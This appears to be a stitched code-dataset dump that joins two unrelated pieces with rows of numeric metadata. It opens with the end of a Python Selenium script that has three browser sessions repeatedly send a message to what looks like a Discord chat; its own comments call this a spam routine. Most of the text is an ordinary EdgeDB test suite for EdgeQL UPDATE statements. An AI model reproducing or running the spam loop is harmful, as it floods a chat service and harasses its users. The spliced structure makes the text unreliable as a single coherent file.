                      "lookFilled-1Gx00P colorBrand-3pXr91 sizeXlarge-2yFAlZ "
                      "grow-q77ONN']")
    try:
        time.sleep(cd)
        for d in (driver, driver2, driver3):
            d.find_element_by_xpath(message_box).send_keys(
                msg + Keys.ENTER + Keys.ENTER + Keys.ENTER)
        time.sleep(cd)
    except ElementNotInteractableException:
        # Message box blocked by a dialog: dismiss it via the primary button.
        for d in (driver, driver2, driver3):
            d.find_element_by_xpath(primary_button).send_keys(
                Keys.ENTER + Keys.ENTER + Keys.ENTER + Keys.ENTER)
        time.sleep(2 * cd)
# Run the spam routine exactly `num` times, as the user requested.
async def sla():
    """Invoke cuzin() ``num`` times.

    Bug fix: the original loop used ``while i <= num`` starting from 0,
    which executed ``num + 1`` iterations — one more round than the count
    the user entered at the "quantas vezes" prompt.
    """
    for _ in range(num):
        await cuzin()
# Entry point: drive the whole spam loop to completion on the event loop.
asyncio.run(sla())
| 44.959184
| 154
| 0.597745
| 1,624
| 13,218
| 4.748153
| 0.158251
| 0.047205
| 0.082609
| 0.112048
| 0.856309
| 0.831539
| 0.80664
| 0.786798
| 0.767086
| 0.743613
| 0
| 0.018809
| 0.275987
| 13,218
| 293
| 155
| 45.112628
| 0.786938
| 0
| 0
| 0.659091
| 0
| 0.013636
| 0.315273
| 0.126798
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.022727
| 0.040909
| null | null | 0.063636
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9cfa826a0cc6c82ca6e8b2014a00fcd658d82a4
| 72,248
|
py
|
Python
|
tests/test_edgeql_update.py
|
pnijhara/edgedb
|
04e47118ef4d2af5dca1a6bd937bb737873329c9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_update.py
|
pnijhara/edgedb
|
04e47118ef4d2af5dca1a6bd937bb737873329c9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_update.py
|
pnijhara/edgedb
|
04e47118ef4d2af5dca1a6bd937bb737873329c9
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os.path
import uuid
import edgedb
from edb.testbase import server as tb
# Functional tests for the EdgeQL UPDATE statement, run against the schema
# and fixture data referenced below.
class TestUpdate(tb.QueryTestCase):
# Schema and setup script paths resolved relative to this test file.
SCHEMA = os.path.join(os.path.dirname(__file__), 'schemas',
'updates.esdl')
SETUP = os.path.join(os.path.dirname(__file__), 'schemas',
'updates.edgeql')
@classmethod
def setUpClass(cls):
# After the standard class setup, snapshot the pristine UpdateTest rows
# once so individual tests can compare their results against them.
super().setUpClass()
cls.loop.run_until_complete(cls._setup_objects())
@classmethod
async def _setup_objects(cls):
"""Fetch and cache the initial state of all UpdateTest objects.

Stores the parsed JSON (a name-ordered list of dicts with id, name,
comment and status) in ``cls.original`` for later comparison.
"""
cls.original = await cls.con.fetchall_json(r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""")
# this is used to validate what was updated and was untouched
cls.original = json.loads(cls.original)
async def test_edgeql_update_simple_01(self):
"""An UPDATE whose FILTER matches nothing returns an empty set and
leaves every object untouched."""
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
# bad name doesn't exist, so no update is expected
FILTER .name = 'bad name'
SET {
status := (SELECT Status FILTER Status.name = 'Closed')
};
""",
[]
)
# Nothing should have changed relative to the cached original state.
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""",
self.original,
)
async def test_edgeql_update_simple_02(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
name := 'update-test1-updated',
status := (SELECT Status FILTER Status.name = 'Closed')
};
""",
[{}]
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""",
[
{
'id': orig1['id'],
'name': 'update-test1-updated',
'status': {
'name': 'Closed'
}
},
orig2,
orig3,
]
)
async def test_edgeql_update_simple_03(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test2'
SET {
comment := 'updated ' ++ UpdateTest.comment
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
} ORDER BY .name;
""",
[
{
'id': orig1['id'],
'name': orig1['name'],
'comment': orig1['comment'],
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'updated second',
}, {
'id': orig3['id'],
'name': orig3['name'],
'comment': orig3['comment'],
},
]
)
async def test_edgeql_update_simple_04(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
SET {
comment := UpdateTest.comment ++ "!",
status := (SELECT Status FILTER Status.name = 'Closed')
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""",
[
{
'id': orig1['id'],
'name': 'update-test1',
'comment': None,
'status': {
'name': 'Closed'
}
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'second!',
'status': {
'name': 'Closed'
}
}, {
'id': orig3['id'],
'name': 'update-test3',
'comment': 'third!',
'status': {
'name': 'Closed'
}
},
]
)
async def test_edgeql_update_returning_01(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
SELECT (
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test2'
SET {
comment := 'updated ' ++ UpdateTest.comment
}
) {
id,
name,
comment,
};
""",
[{
'id': orig2['id'],
'name': 'update-test2',
'comment': 'updated second',
}]
)
async def test_edgeql_update_returning_02(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
SELECT (
UPDATE UpdateTest
SET {
comment := UpdateTest.comment ++ "!",
status := (SELECT Status FILTER Status.name = 'Closed')
}
) {
id,
name,
comment,
status: {
name
}
};
""",
[
{
'id': orig1['id'],
'name': 'update-test1',
'comment': None,
'status': {
'name': 'Closed'
}
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'second!',
'status': {
'name': 'Closed'
}
}, {
'id': orig3['id'],
'name': 'update-test3',
'comment': 'third!',
'status': {
'name': 'Closed'
}
},
],
sort=lambda x: x['name']
)
async def test_edgeql_update_returning_03(self):
"""The result of an UPDATE bound in a WITH block can be navigated
(U.status) from the enclosing SELECT."""
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH
MODULE test,
U := (
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test2'
SET {
comment := 'updated ' ++ UpdateTest.comment
}
)
SELECT Status{name}
FILTER Status = U.status
ORDER BY Status.name;
""",
[{'name': 'Open'}],
)
async def test_edgeql_update_returning_04(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH
MODULE test,
Q := (
UPDATE UpdateTest
SET {
comment := UpdateTest.comment ++ "!",
status := (SELECT
Status FILTER Status.name = 'Closed')
}
)
SELECT
Q {
id,
name,
comment,
status: {
name
}
}
ORDER BY
Q.name;
""",
[{
'id': orig1['id'],
'name': 'update-test1',
'comment': None,
'status': {
'name': 'Closed'
}
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'second!',
'status': {
'name': 'Closed'
}
}, {
'id': orig3['id'],
'name': 'update-test3',
'comment': 'third!',
'status': {
'name': 'Closed'
}
}],
)
async def test_edgeql_update_returning_05(self):
# test that plain INSERT and UPDATE return objects they have
# manipulated
try:
data = []
data.append(await self.con.fetchone(r"""
INSERT test::UpdateTest {
name := 'ret5.1'
};
"""))
data.append(await self.con.fetchone(r"""
INSERT test::UpdateTest {
name := 'ret5.2'
};
"""))
data = [str(o.id) for o in data]
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name
}
FILTER .name LIKE '%ret5._'
ORDER BY .name;
""",
[
{
'id': data[0],
'name': 'ret5.1',
},
{
'id': data[1],
'name': 'ret5.2',
}
],
)
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name LIKE '%ret5._'
SET {
name := 'new ' ++ UpdateTest.name
};
""",
[{'id': data_id} for data_id in sorted(data)],
sort=lambda x: x['id']
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name
}
FILTER .name LIKE '%ret5._'
ORDER BY .name;
""",
[
{
'id': data[0],
'name': 'new ret5.1',
},
{
'id': data[1],
'name': 'new ret5.2',
}
],
)
objs = await self.con.fetchall(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name LIKE '%ret5._'
SET {
name := 'new ' ++ UpdateTest.name
};
"""
)
self.assertTrue(hasattr(objs[0], '__tid__'))
finally:
await self.con.execute(r"""
DELETE (
SELECT test::UpdateTest
FILTER .name LIKE '%ret5._'
);
""")
async def test_edgeql_update_generic_01(self):
status = await self.con.fetchone(r"""
WITH MODULE test
SELECT Status{id}
FILTER Status.name = 'Open'
LIMIT 1;
""")
status = str(status.id)
updated = await self.con.fetchall(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test3'
SET {
status := (
SELECT Status
FILTER Status.id = <uuid>$status
)
};
""",
status=status
)
self.assertGreater(len(updated), 0)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
status: {
name
}
} FILTER UpdateTest.name = 'update-test3';
""",
[
{
'name': 'update-test3',
'status': {
'name': 'Open',
},
},
]
)
async def test_edgeql_update_filter_01(self):
"""FILTER over a SELECT-wrapped (SET OF) subject is trivially true,
so the UPDATE touches every object."""
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE (SELECT UpdateTest)
# this FILTER is trivial because UpdateTest is wrapped
# into a SET OF by SELECT
FILTER UpdateTest.name = 'update-test1'
SET {
comment := 'bad test'
};
""",
[{}, {}, {}],
)
# All three objects got the new comment, not just 'update-test1'.
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.comment;
""",
['bad test'] * 3,
)
async def test_edgeql_update_filter_02(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE (<UpdateTest>{} ?? UpdateTest)
# this FILTER is trivial because UpdateTest is wrapped
# into a SET OF by ??
FILTER UpdateTest.name = 'update-test1'
SET {
comment := 'bad test'
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.comment;
""",
['bad test'] * 3,
)
async def test_edgeql_update_multiple_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (SELECT Tag)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'boring',
}, {
'name': 'fun',
}, {
'name': 'wow',
}],
},
]
)
async def test_edgeql_update_multiple_02(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (SELECT Tag FILTER Tag.name = 'wow')
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'wow',
}],
},
]
)
async def test_edgeql_update_multiple_03(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (SELECT Tag FILTER Tag.name IN {'wow', 'fun'})
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'fun',
}, {
'name': 'wow',
}],
},
]
)
async def test_edgeql_update_multiple_04(self):
await self.assert_query_result(
r"""
# first add a tag to UpdateTest
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := (
SELECT Tag
FILTER Tag.name = 'fun'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[{
'name': 'update-test1',
'tags': [{
'name': 'fun',
}],
}],
)
await self.assert_query_result(
r"""
# now add another tag, but keep the existing one, too
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
tags := UpdateTest.tags UNION (
SELECT Tag
FILTER Tag.name = 'wow'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[{
'name': 'update-test1',
'tags': [{
'name': 'fun',
}, {
'name': 'wow',
}],
}],
)
async def test_edgeql_update_multiple_05(self):
await self.assert_query_result(
r"""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
related := (SELECT U2 FILTER U2.name != 'update-test1')
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
related: {
name
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'related': [{
'name': 'update-test2',
}, {
'name': 'update-test3',
}],
},
]
)
async def test_edgeql_update_multiple_06(self):
await self.assert_query_result(
r"""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_tests := (
SELECT U2 FILTER U2.name != 'update-test1'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_tests': [{
'name': 'update-test2',
'@note': None,
}, {
'name': 'update-test3',
'@note': None,
}],
},
]
)
async def test_edgeql_update_multiple_07(self):
await self.assert_query_result(
r"""
WITH
MODULE test,
U2 := UpdateTest
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_tests := (
SELECT U2 {
@note := 'note' ++ U2.name[-1]
} FILTER U2.name != 'update-test1'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_tests: {
name,
@note
} ORDER BY .name
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_tests': [{
'name': 'update-test2',
'@note': 'note2',
}, {
'name': 'update-test3',
'@note': 'note3',
}],
},
]
)
async def test_edgeql_update_multiple_08(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-8-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-8-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-8-3',
};
""")
await self.assert_query_result(
r"""
# make tests related to the other 2
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-8-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-8-%'
SET {
related := (SELECT UT FILTER UT != UpdateTest)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-8-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-8-1',
'related': [
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-2',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-3',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
],
},
],
)
await self.assert_query_result(
r"""
# now update related tests based on existing related tests
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-8-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-8-%'
SET {
# since there are 2 tests in each FILTER, != is
# guaranteed to be TRUE for at least one of them
related := (SELECT UT FILTER UT != UpdateTest.related)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-8-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-8-1',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-2',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
{
'name': 'update-test-8-3',
'related': [
{'name': 'update-test-8-1'},
{'name': 'update-test-8-2'},
{'name': 'update-test-8-3'},
],
},
],
)
async def test_edgeql_update_multiple_09(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-9-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-9-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-9-3',
};
""")
await self.assert_query_result(
r"""
# make tests related to the other 2
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-9-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-9-%'
SET {
related := (SELECT UT FILTER UT != UpdateTest)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-9-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-9-1',
'related': [
{'name': 'update-test-9-2'},
{'name': 'update-test-9-3'},
],
},
{
'name': 'update-test-9-2',
'related': [
{'name': 'update-test-9-1'},
{'name': 'update-test-9-3'},
],
},
{
'name': 'update-test-9-3',
'related': [
{'name': 'update-test-9-1'},
{'name': 'update-test-9-2'},
],
},
],
)
await self.assert_query_result(
r"""
# now update related tests based on existing related tests
WITH
MODULE test,
UT := (SELECT UpdateTest
FILTER .name LIKE 'update-test-9-%')
UPDATE UpdateTest
FILTER .name LIKE 'update-test-9-%'
SET {
# this should make the related test be the same as parent
related := (SELECT UT FILTER UT NOT IN UpdateTest.related)
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-9-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-9-1',
'related': [
{'name': 'update-test-9-1'},
],
},
{
'name': 'update-test-9-2',
'related': [
{'name': 'update-test-9-2'},
],
},
{
'name': 'update-test-9-3',
'related': [
{'name': 'update-test-9-3'},
],
},
],
)
async def test_edgeql_update_multiple_10(self):
await self.con.execute("""
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-10-1',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-10-2',
};
WITH MODULE test
INSERT UpdateTest {
name := 'update-test-10-3',
};
""")
await self.assert_query_result(
r"""
# make each test related to 'update-test-10-1'
WITH
MODULE test,
UT := (
SELECT UpdateTest FILTER .name = 'update-test-10-1'
)
UPDATE UpdateTest
FILTER .name LIKE 'update-test-10-%'
SET {
related := UT
};
""",
[
{'id': uuid.UUID},
{'id': uuid.UUID},
{'id': uuid.UUID},
],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-10-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-10-1',
'related': [
{'name': 'update-test-10-1'},
],
},
{
'name': 'update-test-10-2',
'related': [
{'name': 'update-test-10-1'},
],
},
{
'name': 'update-test-10-3',
'related': [
{'name': 'update-test-10-1'},
],
},
],
)
await self.assert_query_result(
r"""
# now update related tests
WITH MODULE test
# there's only one item in the UPDATE set
UPDATE UpdateTest.related
FILTER .name LIKE 'update-test-10-%'
SET {
# every test is .<related to 'update-test1'
related := UpdateTest.related.<related[IS UpdateTest]
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest{
name,
related: {name} ORDER BY .name
}
FILTER .name LIKE 'update-test-10-%'
ORDER BY .name;
""",
[
{
'name': 'update-test-10-1',
'related': [
{'name': 'update-test-10-1'},
{'name': 'update-test-10-2'},
{'name': 'update-test-10-3'},
],
},
{
'name': 'update-test-10-2',
'related': [
{'name': 'update-test-10-1'},
],
},
{
'name': 'update-test-10-3',
'related': [
{'name': 'update-test-10-1'},
],
},
],
)
async def test_edgeql_update_props_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
weighted_tags := (
SELECT Tag {
@weight :=
1 IF Tag.name = 'boring' ELSE
2 IF Tag.name = 'wow' ELSE
3
}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
weighted_tags: {
name,
@weight
} ORDER BY @weight
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'weighted_tags': [{
'name': 'boring',
'@weight': 1,
}, {
'name': 'wow',
'@weight': 2,
}, {
'name': 'fun',
'@weight': 3,
}],
},
]
)
async def test_edgeql_update_props_02(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
weighted_tags := (
SELECT Tag {@weight := 1} FILTER Tag.name = 'wow')
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
weighted_tags: {
name,
@weight
} ORDER BY @weight
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'weighted_tags': [{
'name': 'wow',
'@weight': 1,
}],
},
]
)
async def test_edgeql_update_props_03(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
weighted_tags := (
SELECT Tag {
@weight := len(Tag.name) % 2 + 1
} FILTER Tag.name IN {'wow', 'boring'}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
weighted_tags: {
name,
@weight
} ORDER BY @weight
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'weighted_tags': [{
'name': 'boring',
'@weight': 1,
}, {
'name': 'wow',
'@weight': 2,
}],
},
]
)
async def test_edgeql_update_props_05(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status {
@note := 'Victor'
} FILTER Status.name = 'Closed'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Closed',
'@note': 'Victor',
},
},
]
)
async def test_edgeql_update_props_06(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status {
@note := 'Victor'
} FILTER Status = UpdateTest.status
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Open',
'@note': 'Victor',
},
},
]
)
async def test_edgeql_update_props_07(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status FILTER Status.name = 'Open'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Open',
'@note': None,
},
},
]
)
async def test_edgeql_update_props_08(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status := (
SELECT Status {
@note := 'Victor'
} FILTER Status.name = 'Open'
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
# update again, erasing the 'note' value
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
annotated_status: {
@note := <str>{}
}
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
annotated_status: {
name,
@note
}
} FILTER UpdateTest.name = 'update-test1';
""",
[
{
'name': 'update-test1',
'annotated_status': {
'name': 'Open',
'@note': None,
},
},
]
)
async def test_edgeql_update_for_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
FOR x IN {
(name := 'update-test1', comment := 'foo'),
(name := 'update-test2', comment := 'bar')
}
UNION (
UPDATE UpdateTest
FILTER UpdateTest.name = x.name
SET {
comment := x.comment
}
);
""",
[{}, {}], # since updates are in FOR they return objects
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
comment
} ORDER BY UpdateTest.name;
""",
[
{
'name': 'update-test1',
'comment': 'foo'
},
{
'name': 'update-test2',
'comment': 'bar'
},
{
'name': 'update-test3',
'comment': 'third'
},
]
)
async def test_edgeql_update_empty_01(self):
await self.assert_query_result(
r"""
# just clear all the comments
WITH MODULE test
UPDATE UpdateTest
SET {
comment := {}
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.comment;
""",
{},
)
async def test_edgeql_update_empty_02(self):
"""Assigning a typed empty set of the wrong type (<int64>{}) to a str
property must raise InvalidPropertyTargetError."""
with self.assertRaisesRegex(
edgedb.InvalidPropertyTargetError,
r"invalid target for property.*std::int64.*expecting .*str'"):
await self.con.execute(r"""
# just clear all the comments
WITH MODULE test
UPDATE UpdateTest
SET {
comment := <int64>{}
};
""")
async def test_edgeql_update_empty_03(self):
"""Clearing a required property with {} must raise
MissingRequiredError."""
with self.assertRaisesRegex(
edgedb.MissingRequiredError,
r"missing value for required property"):
await self.con.execute(r"""
# just clear all the comments
WITH MODULE test
UPDATE UpdateTest
SET {
name := {}
};
""")
async def test_edgeql_update_empty_04(self):
await self.assert_query_result(
r"""
# just clear all the statuses
WITH MODULE test
UPDATE UpdateTest
SET {
status := {}
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.status;
""",
{},
)
async def test_edgeql_update_empty_05(self):
with self.assertRaisesRegex(
edgedb.InvalidLinkTargetError,
r"invalid target for link.*std::Object.*"
r"expecting 'test::Status'"):
await self.con.execute(r"""
# just clear all the statuses
WITH MODULE test
UPDATE UpdateTest
SET {
status := <Object>{}
};
""")
async def test_edgeql_update_cardinality_01(self):
"""Assigning a multi set (all Status objects) to a single link must be
rejected with a cardinality error."""
with self.assertRaisesRegex(
edgedb.QueryError,
'single'):
await self.con.execute(r'''
SET MODULE test;
UPDATE UpdateTest
SET {
status := Status
};
''')
async def test_edgeql_update_cardinality_02(self):
await self.assert_query_result(r'''
WITH MODULE test
SELECT stdgraphql::Query {
multi x0 := (
WITH x1 := (
UPDATE UpdateTest
FILTER .name = 'update-test1'
SET {
status := (
SELECT Status
# the ID is non-existent
FILTER .id = <uuid>
'10000000-aaaa-bbbb-cccc-d00000000000'
)
}
)
SELECT x1 {
name,
status: {
name
}
}
)
};
''', [{
'x0': [{'name': 'update-test1', 'status': None}]
}])
async def test_edgeql_update_new_01(self):
# test and UPDATE with a new object
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test1'
SET {
tags := (
INSERT Tag {
name := 'new tag'
}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
tags: {
name
}
} FILTER .name = 'update-test1';
""",
[
{
'name': 'update-test1',
'tags': [{
'name': 'new tag',
}],
},
]
)
async def test_edgeql_update_new_02(self):
# test and UPDATE with a new object
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER .name = 'update-test1'
SET {
status := (
INSERT Status {
name := 'new status'
}
)
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
status: {
name
}
} FILTER .name = 'update-test1';
""",
[
{
'name': 'update-test1',
'status': {
'name': 'new status',
},
},
]
)
async def test_edgeql_update_collection_01(self):
# test and UPDATE with a collection
